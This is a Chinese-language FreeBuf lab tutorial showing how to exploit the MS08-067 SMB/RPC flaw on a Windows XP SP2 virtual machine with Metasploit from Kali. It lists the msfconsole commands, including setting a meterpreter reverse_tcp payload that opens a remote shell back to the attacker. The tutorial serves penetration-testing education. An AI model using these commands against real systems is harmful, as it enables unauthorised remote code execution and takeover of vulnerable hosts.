freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
Zxl2605 2021-05-24 20:18:40 273979

kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)

漏洞简介

MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。

如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。

实验环境:

工具:metasploit

靶机两台:windows xp2和kali2020

攻击机的IP(kali):192.168.29.133

靶机IP(xp2):  192.168.29.134

实验条件:两台机子可以互通的,并且windows xp2(需打开445端口,默认为打开)开启了445端口,防火墙是关闭的。

步骤:

1)在kali终端输入msfconsole,启动Metasploit工具

1621858576_60ab9910ab60570126b25.png!small?1621858577458

2)输入命令search ms08_067,查找关于ms08_067的漏洞模块。

1621858587_60ab991be26b93680fb9d.png!small?1621858588222

3)输入如下命令,使用该漏洞模块

1621858596_60ab992458723eb368ed6.png!small?1621858597634

4进入这个模块后,show options 查看该模块需要配置的参数

1621858607_60ab992f29771bc437717.png!small?1621858607570

5)设置配置项(show options)

设置靶机IP(xp2set RHOST 192.168.29.134

1621858621_60ab993d4df7cdd991aaa.png!small?1621858621596

设置要执行的payload:set payload windows/meterpreter/reverse_tcp

1621858632_60ab994813a7faafe1a21.png!small?1621858632290

设置攻击机的IP(kali):set LHOST 192.168.29.133

1621858643_60ab995398414f3a7171b.png!small?1621858643921

设置要攻击的目标操作系统类型:set target 34

1621858657_60ab99615a29ddff0059e.png!small?1621858657641

用show options查看相关参数是否配置正确

1621858669_60ab996d65512a2eea206.png!small?1621858669929

(6)最后,输入exploit,回车运行,进入到特殊的payload---meterpreter,该payload在控制靶机之后,能够对靶机执行更多的渗透攻击。用 pwd查看靶机当前的工作路径,用ipconfig命令查看靶机的IP地址配置

1621858691_60ab99832c43d7e3ca528.png!small?1621858691769


# web安全
本文为 Zxl2605 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
CTF靶机渗透测试
威胁情报收集
Zxl2605 LV.5
这家伙太懒了,还未填写个人描述!
  • 21 文章数
  • 51 关注者
文件包含漏洞引发一系列的不安全问题
2021-07-16
浅谈XXE漏洞
2021-07-14
dnslog盲注
2021-07-14
文章目录